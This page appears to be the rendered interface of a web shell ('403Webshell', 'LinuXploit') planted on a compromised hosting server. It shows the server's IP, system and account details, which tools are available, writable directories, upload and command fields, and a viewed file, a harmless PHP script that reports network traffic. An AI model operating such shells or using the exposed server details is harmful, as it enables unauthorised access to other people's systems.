403Webshell
Server IP : 216.238.111.58  /  Your IP : 216.73.217.34
Web Server : LiteSpeed
System : Linux hosting.smartskills.com.br 4.18.0-553.120.1.el8_10.x86_64 #1 SMP Mon Apr 20 18:04:27 EDT 2026 x86_64
User : skillsitcom ( 1002)
PHP Version : 8.3.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/skillsitcom/.trash/dashboard/front/sh/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/skillsitcom/.trash/dashboard/front/sh/traf.php
<?php

	 $interval = 2;	
		
    $tx_path = 'cat /sys/class/net/eth0/statistics/tx_bytes';
    $rx_path = 'cat /sys/class/net/eth0/statistics/rx_bytes';

    $tx_start = intval(shell_exec($tx_path));
    $rx_start = intval(shell_exec($rx_path));

    sleep($interval);

    $tx_end = intval(shell_exec($tx_path));
    $rx_end = intval(shell_exec($rx_path));

    $result['tx'] = round(($tx_end - $tx_start)/1024, 2);
    $result['rx'] = round(($rx_end - $rx_start)/1024, 2);
    
    //echo json_encode($result);
	 echo "TX: ".$result['tx']." KB/s<br>";    
    echo "RX: ".$result['rx']." KB/s";
    
    
    /*
    		<li class="data-row">
			<span class="data-name" style="color: #cecece;">NET:</span>
			<span class="data-value">'; include './sh/traf.php'; 
		
echo		'</span>
		</li>
		
    */
	

Youez - 2016 - github.com/yon3zu
LinuXploit